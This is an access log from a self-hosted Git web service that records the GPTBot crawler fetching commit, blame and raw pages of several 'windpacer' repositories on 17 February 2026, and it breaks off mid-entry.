"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:14:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fAbout.tsx" [Client 74.7.227.38] [Length 25871] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" +[17/Feb/2026:14:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14852] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9930] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" +[17/Feb/2026:14:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" +[17/Feb/2026:14:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10462] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" +[17/Feb/2026:14:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fHeader.tsx" [Client 74.7.227.38] [Length 26839] [Gzip 5.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fFooter.tsx" [Client 74.7.227.38] [Length 26212] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fnormalizer" [Client 74.7.227.38] [Length 24109] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:14:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fwebsockets" [Client 74.7.227.38] [Length 24092] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:14:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fContact.tsx" [Client 74.7.227.38] [Length 28728] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fcomponents%2fChatBot.tsx" [Client 74.7.227.38] [Length 27738] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fasset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 23152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:14:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2fdatabase.py" [Client 74.7.227.38] [Length 25261] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" +[17/Feb/2026:14:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2ffetcher.py" [Client 74.7.227.38] [Length 30282] [Gzip 5.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fapp%2fcalculator.py" [Client 74.7.227.38] [Length 26178] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10934] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:14:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10886] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:14:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 10928] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:14:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10932] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:14:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10934] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:14:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 13878] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:14:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fServices.tsx" [Client 74.7.227.38] [Length 26564] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" +[17/Feb/2026:14:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fContact.tsx" [Client 74.7.227.38] [Length 28721] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" +[17/Feb/2026:14:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fcomponents%2fChatBot.tsx" [Client 74.7.227.38] [Length 27719] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" +[17/Feb/2026:14:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 10892] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 10861] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" +[17/Feb/2026:14:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" +[17/Feb/2026:14:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13524] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:14:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:14:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.diff" [Client 74.7.227.38] [Length 1157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" +[17/Feb/2026:14:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:14:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" [Client 74.7.227.38] [Length 10141] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:14:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" +[17/Feb/2026:14:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 4587481] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:14:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 14152419] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +[17/Feb/2026:14:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10844] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" +[17/Feb/2026:14:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fupdate_status.py" [Client 74.7.227.38] [Length 24925] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" +[17/Feb/2026:14:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:56:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fproject.assets.json" [Client 74.7.227.38] [Length 20706] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:14:56:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode" +[17/Feb/2026:14:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10943] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" +[17/Feb/2026:14:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fhoneywell-logo.svg" [Client 74.7.227.38] [Length 22248] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:14:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20102] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 